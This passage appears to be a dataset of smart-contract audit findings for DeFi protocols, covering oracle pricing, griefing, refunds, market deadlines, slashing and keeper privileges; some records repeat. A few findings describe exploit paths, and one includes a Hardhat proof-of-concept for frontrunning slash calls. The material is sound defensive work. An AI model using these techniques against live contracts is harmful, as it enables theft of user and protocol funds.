minLpAmount_);\\n```\\n -stETH/ETH chainlink oracle has too long of heartbeat and deviation threshold which can cause loss of fundsчmediumчgetTknOhmPrice uses the stETH/ETH chainlink oracle to calculate the current price of the OHM token. This token valuation is used to determine the amount of stETH to skim from the user resulting from oracle arb. This is problematic since stETH/ETH has a 24 hour heartbeat and a 2% deviation threshold. 
This deviation in price could easily cause loss of funds to the user.\\nBLVaultManagerLido.sol#L458-L473\\n```\\nfunction getTknOhmPrice() public view override returns (uint256) {\\n    // Get stETH per wstETH (18 Decimals)\\n    uint256 stethPerWsteth = IWsteth(pairToken).stEthPerToken();\\n\\n    // Get ETH per OHM (18 Decimals)\\n    uint256 ethPerOhm = _validatePrice(ohmEthPriceFeed.feed, ohmEthPriceFeed.updateThreshold);\\n\\n    // Get stETH per ETH (18 Decimals)\\n    uint256 stethPerEth = _validatePrice(\\n        stethEthPriceFeed.feed,\\n        stethEthPriceFeed.updateThreshold\\n    );\\n\\n    // Calculate wstETH per OHM (18 decimals)\\n    return (ethPerOhm * 1e36) / (stethPerWsteth * stethPerEth);\\n}\\n```\\n\\ngetTknOhmPrice uses the stETH/ETH oracle to determine the price which, as stated above, has a 24 hour heartbeat and 2% deviation threshold; this means that the price can move up to 2%, or 24 hours can pass, before a price update is triggered. The result is that the on-chain price could be much different from the true stETH price.\\nBLVaultLido.sol#L232-L240\\n```\\n        uint256 wstethOhmPrice = manager.getTknOhmPrice();\\n        uint256 expectedWstethAmountOut = (ohmAmountOut * wstethOhmPrice) / _OHM_DECIMALS;\\n\\n        // Take any arbs relative to the oracle price for the Treasury and return the rest to the owner\\n        uint256 wstethToReturn = wstethAmountOut > expectedWstethAmountOut\\n            ? expectedWstethAmountOut\\n            : wstethAmountOut;\\n        if (wstethAmountOut > wstethToReturn)\\n            wsteth.safeTransfer(TRSRY(), wstethAmountOut - wstethToReturn);\\n        \\n```\\n\\nThis price is used when determining how much stETH to send back to the user.
Since the oracle can be up to 2% different from the true price, the user can unfairly lose part of their funds.чUse the stETH/USD oracle instead because it has a 1-hour heartbeat and a 1% deviation threshold.чUser will be unfairly penalized due to large variance between on-chain price and asset priceч```\\nfunction getTknOhmPrice() public view override returns (uint256) {\\n    // Get stETH per wstETH (18 Decimals)\\n    uint256 stethPerWsteth = IWsteth(pairToken).stEthPerToken();\\n\\n    // Get ETH per OHM (18 Decimals)\\n    uint256 ethPerOhm = _validatePrice(ohmEthPriceFeed.feed, ohmEthPriceFeed.updateThreshold);\\n\\n    // Get stETH per ETH (18 Decimals)\\n    uint256 stethPerEth = _validatePrice(\\n        stethEthPriceFeed.feed,\\n        stethEthPriceFeed.updateThreshold\\n    );\\n\\n    // Calculate wstETH per OHM (18 decimals)\\n    return (ethPerOhm * 1e36) / (stethPerWsteth * stethPerEth);\\n}\\n```\\n -Normal users could be inadvertently griefed by the withdrawn ratios checkчmediumчThe contract check on the withdrawn ratios of OHM and wstETH against the current oracle price could end up griefing naive users by taking any wstETH-shifted imbalance as a fee to the treasury even though these users have not gamed the system.\\nHere is a typical scenario, assuming the pool has been initiated with total LP equal to sqrt(100_000 * 1_000) = 10_000. (Note: OHM: $15, wstETH: $1500, with the pool pricing matching up with manager.getOhmTknPrice() or manager.getTknOhmPrice(), i.e. 100 OHM to 1 wstETH or 0.01 wstETH to 1 OHM.
The pool token balances in each step below may be calculated via the Constant Product Simulation after each swap and stake.)\\n```\\nOHM token balance: 100_000\\nwstETH token balance: 1_000\\nTotal LP: 10_000\\n```\\n\\nA series of swap activities results in the pool shifted more of the LP into wstETH.\\nOHM token balance: 90_909.1 wstETH token balance: 1_100 Total LP: 10_000\\nBob calls `deposit()` by providing 11 wstETH where 1100 OHM is minted with 1100 - 90909.1 * 0.01 = 190.91 unused OHM burned. (Note: Bob successfully stakes with 909.09 OHM and 11 wstETH and proportionately receives 100 LP.)\\nOHM token balance: 91_818.19 wstETH token balance: 1_111 Total LP: 10_100 User's LP: 100\\nBob changes his mind instantly and proceeds to call `withdraw()` to remove all of his LP. He receives the originally staked 909.09 OHM and 11 wstETH. All OHM is burned but he is only entitled to receive 909.09 / 100 = 9.09 wstETH since the system takes any arbs relative to the oracle price for the Treasury and returns the rest to the owner.\\nOHM token balance: 90_909.1 wstETH token balance: 1_100 Total LP: 10_000 User's LP: 0чConsider implementing a snapshot of the entry record of OHM and wstETH and compare that with the proportionate exit record. 
Slash only the differential for treasury solely on dissuading large attempts to shift the pool around, and in this case it should be 0 wstETH since the originally staked wstETH is no greater than expectedWstethAmountOut.чBob suffers a loss of 11 - 9.09 = 1.91 wstETH (~ 17.36% loss), and the system is ready to trap the next user given the currently imbalanced pool still shifted more of the LP into wstETH.ч```\\nOHM token balance: 100_000\\nwstETH token balance: 1_000\\nTotal LP: 10_000\\n```\\n -Periphery#_swapPTsForTarget won't work correctly if PT is mature but redeem is restrictedчmediumчPeriphery#_swapPTsForTarget doesn't properly account for mature PTs that have their redemption restricted\\nPeriphery.sol#L531-L551\\n```\\nfunction _swapPTsForTarget(\\n address adapter,\\n uint256 maturity,\\n uint256 ptBal,\\n PermitData calldata permit\\n) internal returns (uint256 tBal) {\\n _transferFrom(permit, divider.pt(adapter, maturity), ptBal);\\n\\n if (divider.mscale(adapter, maturity) > 0) {\\n tBal = divider.redeem(adapter, maturity, ptBal); <- @audit-issue always tries to redeem even if restricted\\n } else {\\n tBal = _balancerSwap(\\n divider.pt(adapter, maturity),\\n Adapter(adapter).target(),\\n ptBal,\\n BalancerPool(spaceFactory.pools(adapter, maturity)).getPoolId(),\\n 0,\\n payable(address(this))\\n );\\n }\\n}\\n```\\n\\nAdapters can have their redeem restricted meaning the even when they are mature they can't be redeemed. In the scenario that it is restricted Periphery#_swapPTsForTarget simply won't work.чUse the same structure as _removeLiquidity:\\n```\\n if (divider.mscale(adapter, maturity) > 0) {\\n if (uint256(Adapter(adapter).level()).redeemRestricted()) {\\n ptBal = _ptBal;\\n } else {\\n // 2. 
Redeem PTs for Target\\n tBal += divider.redeem(adapter, maturity, _ptBal);\\n }\\n```\\nчRedemption will fail when redeem is restricted because it tries to redeem instead of swappingч```\\nfunction _swapPTsForTarget(\\n address adapter,\\n uint256 maturity,\\n uint256 ptBal,\\n PermitData calldata permit\\n) internal returns (uint256 tBal) {\\n _transferFrom(permit, divider.pt(adapter, maturity), ptBal);\\n\\n if (divider.mscale(adapter, maturity) > 0) {\\n tBal = divider.redeem(adapter, maturity, ptBal); <- @audit-issue always tries to redeem even if restricted\\n } else {\\n tBal = _balancerSwap(\\n divider.pt(adapter, maturity),\\n Adapter(adapter).target(),\\n ptBal,\\n BalancerPool(spaceFactory.pools(adapter, maturity)).getPoolId(),\\n 0,\\n payable(address(this))\\n );\\n }\\n}\\n```\\n -sponsorSeries() method fails when user want to swap for stake token usingчmediumч`sponsorSeries()` fails when user want to use `swapQuote` to swap for stake token to sponsor a series.\\nstake is token that user need to deposit (technically is pulled) to be able to sponsor a series for a given target. User has option to send `SwapQuote calldata quote` and swap any ERC20 token for stake token. Below is the code that doing transferFrom() of stakeToken not sellToken()\\n```\\nif (address(quote.sellToken) != ETH) _transferFrom(permit, stake, stakeSize);\\n if (address(quote.sellToken) != stake) _fillQuote(quote);\\n```\\n\\nExpected behaviour of this function is to pull `sellToken` from msg.sender when `address(quote.sellToken) != stake`. For example- stake token is WETH. User want to swap DAI for WETH in `sponsorSeries()`. In this case, user would be sending SwapQuote.sellToken = DAI and swapQuote.buyToke = WETH and expect that fillQuote() would swap it for WETH. 
This method will fail because `sellToken` is not transferred from msg.sender.чConsider implementing functionality to transferFrom `sellToken` from msg.sender with the actual amount that is required to get an exact amountOut greater than or equal to `stakeSize`чsponsorSeries() fails when `address(quote.sellToken) != stake`ч```\\nif (address(quote.sellToken) != ETH) _transferFrom(permit, stake, stakeSize);\\n        if (address(quote.sellToken) != stake) _fillQuote(quote);\\n```\\n -Refund of protocol fee is being sent to wrong userчmediumчThere is one function, _fillQuote(), which is handling swap from `0x`. Ideally, if there is any remaining protocol fee (in ETH) then it will be returned to the sender aka msg.sender. There are scenarios when the fee can be sent to the receiver of the swap instead.\\nPeriphery and RollerPeriphery both are using almost identical logic in `_fillQuote()`, hence this vulnerability affects both contracts. It exists if quote.buyToken is ETH and there is any remaining protocol fee.\\nHere are the pieces of the puzzle\\nAfter the swap, if buyToken == ETH then store the contract ETH balance in `boughtAmount`\\n```\\n// RollerPeriphery.sol\\n        boughtAmount = address(quote.buyToken) == ETH ? address(this).balance : quote.buyToken.balanceOf(address(this));\\n```\\n\\nNext it stores refundAmt\\n```\\n// RollerPeriphery.sol\\n        // Refund any unspent protocol fees (paid in ether) to the sender.\\n        uint256 refundAmt = address(this).balance;\\n```\\n\\nCalculate the actual refundAmt and transfer it to the sender\\n```\\n        if (address(quote.buyToken) == ETH) refundAmt = refundAmt - boughtAmount;\\n        payable(msg.sender).transfer(refundAmt);\\n```\\n\\nIt is clear that due to lines 251, 258 and 259, refundAmt is 0. So the sender is not getting a refund.\\nLater on in the logic flow buyToken will be transferred to the receiver\\n```\\n        address(quote.buyToken) == ETH\\n            ?
payable(receiver).transfer(amtOut)\\n : ERC20(address(quote.buyToken)).safeTransfer(receiver, amtOut); // transfer bought tokens to receiver\\n```\\nчConsider intercepting refund amount properly when buyToken is ETH or else just handle refund when buyToken is NOT ETH and write some explanation around it.чSender is not getting protocol fee refund.ч```\\n// RollerPeriphery.sol\\n boughtAmount = address(quote.buyToken) == ETH ? address(this).balance : quote.buyToken.balanceOf(address(this));\\n```\\n -sponsorSeries() method fails when user want to swap for stake token usingчmediumч`sponsorSeries()` fails when user want to use `swapQuote` to swap for stake token to sponsor a series.\\nstake is token that user need to deposit (technically is pulled) to be able to sponsor a series for a given target. User has option to send `SwapQuote calldata quote` and swap any ERC20 token for stake token. Below is the code that doing transferFrom() of stakeToken not sellToken()\\n```\\nif (address(quote.sellToken) != ETH) _transferFrom(permit, stake, stakeSize);\\n if (address(quote.sellToken) != stake) _fillQuote(quote);\\n```\\n\\nExpected behaviour of this function is to pull `sellToken` from msg.sender when `address(quote.sellToken) != stake`. For example- stake token is WETH. User want to swap DAI for WETH in `sponsorSeries()`. In this case, user would be sending SwapQuote.sellToken = DAI and swapQuote.buyToke = WETH and expect that fillQuote() would swap it for WETH. 
This method will fail because `sellToken` not transferred from msg.sender.чConsider implementation of functionality to transferFrom `sellToken` from msg.sender with actual amount that is require to get exact amountOut greater or equal to `stakeSize`чsponsorSeries() fails when `address(quote.sellToken) != stake`ч```\\nif (address(quote.sellToken) != ETH) _transferFrom(permit, stake, stakeSize);\\n if (address(quote.sellToken) != stake) _fillQuote(quote);\\n```\\n -Periphery#_swapPTsForTarget won't work correctly if PT is mature but redeem is restrictedчmediumчPeriphery#_swapPTsForTarget doesn't properly account for mature PTs that have their redemption restricted\\nPeriphery.sol#L531-L551\\n```\\nfunction _swapPTsForTarget(\\n address adapter,\\n uint256 maturity,\\n uint256 ptBal,\\n PermitData calldata permit\\n) internal returns (uint256 tBal) {\\n _transferFrom(permit, divider.pt(adapter, maturity), ptBal);\\n\\n if (divider.mscale(adapter, maturity) > 0) {\\n tBal = divider.redeem(adapter, maturity, ptBal); <- @audit-issue always tries to redeem even if restricted\\n } else {\\n tBal = _balancerSwap(\\n divider.pt(adapter, maturity),\\n Adapter(adapter).target(),\\n ptBal,\\n BalancerPool(spaceFactory.pools(adapter, maturity)).getPoolId(),\\n 0,\\n payable(address(this))\\n );\\n }\\n}\\n```\\n\\nAdapters can have their redeem restricted meaning the even when they are mature they can't be redeemed. In the scenario that it is restricted Periphery#_swapPTsForTarget simply won't work.чUse the same structure as _removeLiquidity:\\n```\\n if (divider.mscale(adapter, maturity) > 0) {\\n if (uint256(Adapter(adapter).level()).redeemRestricted()) {\\n ptBal = _ptBal;\\n } else {\\n // 2. 
Redeem PTs for Target\\n tBal += divider.redeem(adapter, maturity, _ptBal);\\n }\\n```\\nчRedemption will fail when redeem is restricted because it tries to redeem instead of swappingч```\\nfunction _swapPTsForTarget(\\n address adapter,\\n uint256 maturity,\\n uint256 ptBal,\\n PermitData calldata permit\\n) internal returns (uint256 tBal) {\\n _transferFrom(permit, divider.pt(adapter, maturity), ptBal);\\n\\n if (divider.mscale(adapter, maturity) > 0) {\\n tBal = divider.redeem(adapter, maturity, ptBal); <- @audit-issue always tries to redeem even if restricted\\n } else {\\n tBal = _balancerSwap(\\n divider.pt(adapter, maturity),\\n Adapter(adapter).target(),\\n ptBal,\\n BalancerPool(spaceFactory.pools(adapter, maturity)).getPoolId(),\\n 0,\\n payable(address(this))\\n );\\n }\\n}\\n```\\n -The createMarket transaction lack of expiration timestamp checkчmediumчThe createMarket transaction lack of expiration timestamp check\\nLet us look into the heavily forked Uniswap V2 contract addLiquidity function implementation\\n```\\n// **** ADD LIQUIDITY ****\\nfunction _addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin\\n) internal virtual returns (uint amountA, uint amountB) {\\n // create the pair if it doesn't exist yet\\n if (IUniswapV2Factory(factory).getPair(tokenA, tokenB) == address(0)) {\\n IUniswapV2Factory(factory).createPair(tokenA, tokenB);\\n }\\n (uint reserveA, uint reserveB) = UniswapV2Library.getReserves(factory, tokenA, tokenB);\\n if (reserveA == 0 && reserveB == 0) {\\n (amountA, amountB) = (amountADesired, amountBDesired);\\n } else {\\n uint amountBOptimal = UniswapV2Library.quote(amountADesired, reserveA, reserveB);\\n if (amountBOptimal <= amountBDesired) {\\n require(amountBOptimal >= amountBMin, 'UniswapV2Router: INSUFFICIENT_B_AMOUNT');\\n (amountA, amountB) = (amountADesired, amountBOptimal);\\n } else {\\n uint amountAOptimal = 
UniswapV2Library.quote(amountBDesired, reserveB, reserveA);\\n assert(amountAOptimal <= amountADesired);\\n require(amountAOptimal >= amountAMin, 'UniswapV2Router: INSUFFICIENT_A_AMOUNT');\\n (amountA, amountB) = (amountAOptimal, amountBDesired);\\n }\\n }\\n}\\n\\nfunction addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin,\\n address to,\\n uint deadline\\n) external virtual override ensure(deadline) returns (uint amountA, uint amountB, uint liquidity) {\\n (amountA, amountB) = _addLiquidity(tokenA, tokenB, amountADesired, amountBDesired, amountAMin, amountBMin);\\n address pair = UniswapV2Library.pairFor(factory, tokenA, tokenB);\\n TransferHelper.safeTransferFrom(tokenA, msg.sender, pair, amountA);\\n TransferHelper.safeTransferFrom(tokenB, msg.sender, pair, amountB);\\n liquidity = IUniswapV2Pair(pair).mint(to);\\n}\\n```\\n\\nthe implementation has two point that worth noting,\\nthe first point is the deadline check\\n```\\nmodifier ensure(uint deadline) {\\n require(deadline >= block.timestamp, 'UniswapV2Router: EXPIRED');\\n _;\\n}\\n```\\n\\nThe transaction can be pending in mempool for a long time and can be executed in a long time after the user submit the transaction.\\nProblem is createMarket, which calculates the length and maxPayout by block.timestamp inside it.\\n```\\n // Calculate market length and check time bounds\\n uint48 length = uint48(params_.conclusion - block.timestamp); \\\\n if (\\n length < minMarketDuration ||\\n params_.depositInterval < minDepositInterval ||\\n params_.depositInterval > length\\n ) revert Auctioneer_InvalidParams();\\n\\n // Calculate the maximum payout amount for this market, determined by deposit interval\\n uint256 capacity = params_.capacityInQuote\\n ? 
params_.capacity.mulDiv(scale, price)\\n : params_.capacity;\\n market.maxPayout = capacity.mulDiv(uint256(params_.depositInterval), uint256(length));\\n```\\n\\nAfter the market is created at wrong time, user can call purchase. At purchaseBond(),\\n```\\n // Payout for the deposit = amount / price\\n //\\n // where:\\n // payout = payout tokens out\\n // amount = quote tokens in\\n // price = quote tokens : payout token (i.e. 200 QUOTE : BASE), adjusted for scaling\\n payout = amount_.mulDiv(term.scale, price);\\n\\n // Payout must be greater than user inputted minimum\\n if (payout < minAmountOut_) revert Auctioneer_AmountLessThanMinimum();\\n\\n // Markets have a max payout amount, capping size because deposits\\n // do not experience slippage. max payout is recalculated upon tuning\\n if (payout > market.maxPayout) revert Auctioneer_MaxPayoutExceeded();\\n```\\n\\npayout value is calculated by term.scale which the market owner has set assuming the market would be created at desired timestamp. 
Even, maxPayout is far bigger than expected, as it is calculated by very small length.чUse deadline, like uniswapчEven though the market owner close the market at any time, malicious user can attack the market before close and steal unexpectedly large amount of payout Tokens.ч```\\n// **** ADD LIQUIDITY ****\\nfunction _addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin\\n) internal virtual returns (uint amountA, uint amountB) {\\n // create the pair if it doesn't exist yet\\n if (IUniswapV2Factory(factory).getPair(tokenA, tokenB) == address(0)) {\\n IUniswapV2Factory(factory).createPair(tokenA, tokenB);\\n }\\n (uint reserveA, uint reserveB) = UniswapV2Library.getReserves(factory, tokenA, tokenB);\\n if (reserveA == 0 && reserveB == 0) {\\n (amountA, amountB) = (amountADesired, amountBDesired);\\n } else {\\n uint amountBOptimal = UniswapV2Library.quote(amountADesired, reserveA, reserveB);\\n if (amountBOptimal <= amountBDesired) {\\n require(amountBOptimal >= amountBMin, 'UniswapV2Router: INSUFFICIENT_B_AMOUNT');\\n (amountA, amountB) = (amountADesired, amountBOptimal);\\n } else {\\n uint amountAOptimal = UniswapV2Library.quote(amountBDesired, reserveB, reserveA);\\n assert(amountAOptimal <= amountADesired);\\n require(amountAOptimal >= amountAMin, 'UniswapV2Router: INSUFFICIENT_A_AMOUNT');\\n (amountA, amountB) = (amountAOptimal, amountBDesired);\\n }\\n }\\n}\\n\\nfunction addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin,\\n address to,\\n uint deadline\\n) external virtual override ensure(deadline) returns (uint amountA, uint amountB, uint liquidity) {\\n (amountA, amountB) = _addLiquidity(tokenA, tokenB, amountADesired, amountBDesired, amountAMin, amountBMin);\\n address pair = UniswapV2Library.pairFor(factory, tokenA, tokenB);\\n TransferHelper.safeTransferFrom(tokenA, msg.sender, 
pair, amountA);\\n TransferHelper.safeTransferFrom(tokenB, msg.sender, pair, amountB);\\n liquidity = IUniswapV2Pair(pair).mint(to);\\n}\\n```\\n -\"Equilibrium price\" is not used to compute the capacity (OSDA Only)чmediumч\"Equilibrium price\" is not used to compute the capacity leading to a smaller-than-expected max payout.\\nIn OFDA, it was observed that if the capacity is denominated in the quote token, the capacity will be calculated with the discounted price.\\n```\\nFile: BondBaseOFDA.sol\\n function _createMarket(MarketParams memory params_) internal returns (uint256) {\\n..SNIP..\\n // Calculate the maximum payout amount for this market\\n uint256 capacity = params_.capacityInQuote\\n ? params_.capacity.mulDiv(\\n scale,\\n price.mulDivUp(\\n uint256(ONE_HUNDRED_PERCENT - params_.fixedDiscount),\\n uint256(ONE_HUNDRED_PERCENT)\\n )\\n )\\n : params_.capacity;\\n market.maxPayout = capacity.mulDiv(uint256(params_.depositInterval), uint256(length));\\n```\\n\\nHowever, in OSDA, if the capacity is denominated in the quote token, the capacity will be calculated with the oracle price instead of the discounted price.\\n```\\nFile: BondBaseOSDA.sol\\n function _createMarket(MarketParams memory params_) internal returns (uint256) {\\n..SNIP..\\n // Calculate the maximum payout amount for this market, determined by deposit interval\\n uint256 capacity = params_.capacityInQuote\\n ? params_.capacity.mulDiv(scale, price)\\n : params_.capacity;\\n market.maxPayout = capacity.mulDiv(uint256(params_.depositInterval), uint256(length));\\n```\\n\\nIn OSDA, it was also observed that the base discount is applied to the oracle price while calculating the price decimals because this will be the initial equilibrium price of the market. 
However, this \"initial equilibrium price\" is not used earlier when computing the capacity.\\n```\\nFile: BondBaseOSDA.sol\\n function _validateOracle(\\n uint256 id_,\\n IBondOracle oracle_,\\n ERC20 quoteToken_,\\n ERC20 payoutToken_,\\n uint48 baseDiscount_\\n )\\n..SNIP..\\n // Get the price decimals for the current oracle price\\n // Oracle price is in quote tokens per payout token\\n // E.g. if quote token is $10 and payout token is $2000,\\n // then the oracle price is 200 quote tokens per payout token.\\n // If the oracle has 18 decimals, then it would return 200 * 10^18.\\n // In this case, the price decimals would be 2 since 200 = 2 * 10^2.\\n // We apply the base discount to the oracle price before calculating\\n // since this will be the initial equilibrium price of the market.\\n int8 priceDecimals = _getPriceDecimals(\\n currentPrice.mulDivUp(\\n uint256(ONE_HUNDRED_PERCENT - baseDiscount_),\\n uint256(ONE_HUNDRED_PERCENT)\\n ),\\n oracleDecimals\\n );\\n```\\nчApplied the discount to obtain the \"equilibrium price\" before computing the capacity.\\n```\\n// Calculate the maximum payout amount for this market, determined by deposit interval\\nuint256 capacity = params_.capacityInQuote\\n// Remove the line below\\n ? params_.capacity.mulDiv(scale, price)\\n// Add the line below\\n ? params_.capacity.mulDiv(scale, price.mulDivUp(\\n// Add the line below\\n uint256(ONE_HUNDRED_PERCENT // Remove the line below\\n params_.baseDiscount),\\n// Add the line below\\n uint256(ONE_HUNDRED_PERCENT)\\n// Add the line below\\n )\\n// Add the line below\\n )\\n : params_.capacity;\\nmarket.maxPayout = capacity.mulDiv(uint256(params_.depositInterval), uint256(length));\\n```\\nчAs the discount is not applied to the price when computing the capacity, the price will be higher which leads to a smaller capacity. A smaller capacity will in turn result in a smaller max payout. 
A smaller-than-expected max payout reduces the maximum number of payout tokens a user can purchase at any single point in time, which might reduce the efficiency of a Bond market.\\nUsers who want to purchase a large number of bond tokens have to break their trade into smaller chunks to overcome the smaller-than-expected max payout, leading to unnecessary delay and additional gas fees.ч```\\nFile: BondBaseOFDA.sol\\n function _createMarket(MarketParams memory params_) internal returns (uint256) {\\n..SNIP..\\n // Calculate the maximum payout amount for this market\\n uint256 capacity = params_.capacityInQuote\\n ? params_.capacity.mulDiv(\\n scale,\\n price.mulDivUp(\\n uint256(ONE_HUNDRED_PERCENT - params_.fixedDiscount),\\n uint256(ONE_HUNDRED_PERCENT)\\n )\\n )\\n : params_.capacity;\\n market.maxPayout = capacity.mulDiv(uint256(params_.depositInterval), uint256(length));\\n```\\n -`slash` calls can be blocked, allowing malicious users to bypass the slashing mechanism.чmediumчA malicious user can block slashing by frontrunning `slash` with a call to `stake(1)` at the same block, allowing him to keep blocking calls to `slash` while waiting for his withdraw delay, effectively bypassing the slashing mechanism.\\nStakingModule's `checkpointProtection` modifier reverts certain actions, like claims, if the accounts' stake was previously modified in the same block. A malicious user can exploit this to intentionally block calls to `slash`.\\nConsider the following scenario, where Alice has `SLASHER_ROLE` and Bob is the malicious user.\\nAlice calls `slash` on Bob's account.\\nBob sees the transaction on the mempool and tries to frontrun it by staking 1 TEL. 
(See Proof of Concept section below for a simplified example of this scenario)\\nIf Bob stake call is processed first (he can pay more gas to increase his odds of being placed before than Alice), his new stake is pushed to `_stakes[address(Bob)]`, and his latest checkpoint (_stakes[address(Bob)]._checkpoints[numCheckpoints - 1]) `blockNumber` field is updated to the current `block.number`. So when `slash` is being processed in the same block and calls internally `_claimAndExit` it will revert due to the `checkpointProtection` modifier check (See code snippet below).\\n```\\nmodifier checkpointProtection(address account) {\\n uint256 numCheckpoints = _stakes[account]._checkpoints.length;\\n require(numCheckpoints == 0 || _stakes[account]._checkpoints[numCheckpoints - 1]._blockNumber != block.number, \"StakingModule: Cannot exit in the same block as another stake or exit\");\\n _;\\n}\\n```\\n\\nBob can do this indefinitely, eventually becoming a gas war between Alice and Bob or until Alice tries to use Flashbots Protect or similar services to avoid the public mempool. More importantly, this can be leverage to block all `slash` attempts while waiting the time required to withdraw, so the malicious user could call `requestWithdrawal()`, then keep blocking all future `slash` calls while waiting for his `withdrawalDelay`, then proceed to withdraws his stake when `block.timestamp > withdrawalRequestTimestamps[msg.sender] + withdrawalDelay`. 
Therefore bypassing the slashing mechanism.\\nIn this modified scenario\\nAlice calls `slash` on Bob's account.\\nBob sees the transaction on the mempool and tries to frontrun it by staking 1 TEL.\\nBob requests his withdraw (requestWithdrawal())\\nBob keeps monitoring the mempool for future calls to `slash` against his account, trying to frontrun each one of them.\\nWhen enough time has passed so that his withdraw is available, Bob calls `exit` or `fullClaimAndExit`чConsider implementing a specific version of `_claimAndExit` without the `checkpointProtection` modifier, to be used inside the `slash` function.чSlashing calls can be blocked by malicious user, allowing him to request his withdraw, wait until withdraw delay has passed (while blocking further calls to slash) and then withdraw his funds.\\nClassify this one as medium severity, because even though there are ways to avoid being frontrunned, like paying much more gas or using services like Flashbots Protect, none is certain to work because the malicious user can use the same methods to their advantage. And if the malicious user is successful, this would result in loss of funds to the protocol (i.e funds that should have been slashed, but user managed to withdraw them)\\nProof of Concept\\nThe POC below shows that staking prevents any future call to `slash` on the same block. 
To reproduce this POC just copy the code to a file on the test/ folder and run it.\\n```\\nconst { expect } = require(\"chai\")\\nconst { ethers, upgrades } = require(\"hardhat\")\\n\\nconst emptyBytes = []\\n\\ndescribe(\"POC\", () => {\\n let deployer\\n let alice\\n let bob\\n let telContract\\n let stakingContract\\n let SLASHER_ROLE\\n\\n beforeEach(\"setup\", async () => {\\n [deployer, alice, bob] = await ethers.getSigners()\\n\\n //Deployments\\n const TELFactory = await ethers.getContractFactory(\"TestTelcoin\", deployer)\\n const StakingModuleFactory = await ethers.getContractFactory(\\n \"StakingModule\",\\n deployer\\n )\\n telContract = await TELFactory.deploy(deployer.address)\\n await telContract.deployed()\\n stakingContract = await upgrades.deployProxy(StakingModuleFactory, [\\n telContract.address,\\n 3600,\\n 10\\n ])\\n\\n //Grant SLASHER_ROLE to Alice\\n SLASHER_ROLE = await stakingContract.SLASHER_ROLE()\\n await stakingContract\\n .connect(deployer)\\n .grantRole(SLASHER_ROLE, alice.address)\\n\\n //Send some TEL tokens to Bob\\n await telContract.connect(deployer).transfer(bob.address, 1)\\n\\n //Setup approvals\\n await telContract\\n .connect(bob)\\n .approve(stakingContract.address, 1)\\n })\\n\\n describe(\"POC\", () => {\\n it(\"should revert during slash\", async () => {\\n //Disable auto-mining and set interval to 0 necessary to guarantee both transactions\\n //below are mined in the same block, reproducing the frontrunning scenario.\\n await network.provider.send(\"evm_setAutomine\", [false]);\\n await network.provider.send(\"evm_setIntervalMining\", [0]);\\n\\n //Bob stakes 1 TEL\\n await stakingContract\\n .connect(bob)\\n .stake(1)\\n\\n //Turn on the auto-mining, so that after the next transaction is sent, the block is mined.\\n await network.provider.send(\"evm_setAutomine\", [true]);\\n \\n //Alice tries to slash Bob, but reverts.\\n await expect(stakingContract\\n .connect(alice)\\n .slash(bob.address, 1, 
stakingContract.address, emptyBytes)).to.be.revertedWith(\\n \"StakingModule: Cannot exit in the same block as another stake or exit\"\\n )\\n })\\n })\\n})\\n```\\nч```\\nmodifier checkpointProtection(address account) {\\n uint256 numCheckpoints = _stakes[account]._checkpoints.length;\\n require(numCheckpoints == 0 || _stakes[account]._checkpoints[numCheckpoints - 1]._blockNumber != block.number, \"StakingModule: Cannot exit in the same block as another stake or exit\");\\n _;\\n}\\n```\\n -FeeBuyback.submit() method may fail if all allowance is not used by referral contractчmediumчInside `submit()` method of `FeeBuyback.sol`, if token is `_telcoin` then it safeApprove to `_referral` contract. If `_referral` contract do not use all allowance then `submit()` method will fail in next call.\\n`SafeApprove()` method of library `SafeERC20Upgradeable` revert in following scenario.\\n```\\nrequire((value == 0) || (token.allowance(address(this), spender) == 0), \\n\"SafeERC20: approve from non-zero to non-zero allowance\");\\n```\\n\\nSubmit method is doing `safeApproval` of Telcoin to referral contract. If referral contract do not use full allowance then subsequent call to `submit()` method will fails because of `SafeERC20: approve from non-zero to non-zero allowance`. `FeeBuyback` contract should not trust or assume that referral contract will use all allowance. If it does not use all allowance in `increaseClaimableBy()` method then `submit()` method will revert in next call. This vulnerability exists at two places in `submit()` method. 
Link given in code snippet section.чReset allowance to 0 before non-zero approval.\\n```\\n_telcoin.safeApprove(address(_referral), 0);\\n_telcoin.safeApprove(address(_referral), _telcoin.balanceOf(address(this)));\\n```\\nчSubmit() call will fail until referral contract do not use all allowance.ч```\\nrequire((value == 0) || (token.allowance(address(this), spender) == 0), \\n\"SafeERC20: approve from non-zero to non-zero allowance\");\\n```\\n -Missing input validation for _rewardProportion parameter allows keeper to escalate his privileges and pay back all loansчhighчThey are also able to choose how much yield token to swap and what the proportion of the resulting TAU is that is distributed to users vs. not distributed in order to erase bad debt.\\nSo a `keeper` is not trusted to perform any actions that go beyond swapping yield / performing liquidations.\\nHowever there is a missing input validation for the `_rewardProportion` parameter in the `SwapHandler.swapForTau` function. This allows a keeper to \"erase\" all debt of users. So users can withdraw their collateral without paying any of the debt.\\nBy looking at the code we can see that `_rewardProportion` is used to determine the amount of `TAU` that `_withholdTau` is called with: Link\\n```\\n_withholdTau((tauReturned * _rewardProportion) / Constants.PERCENT_PRECISION);\\n```\\n\\nAny value of `_rewardProportion` greater than `1e18` means that more `TAU` will be distributed to users than has been burnt (aka erasing debt).\\nIt is easy to see how the `keeper` can chose the number so big that `_withholdTau` is called with a value close to `type(uint256).max` which will certainly be enough to erase all debt.чI discussed this issue with the sponsor and it is intended that the `keeper` role can freely chose the value of the `_rewardProportion` parameter within the `[0,1e18]` range, i.e. 
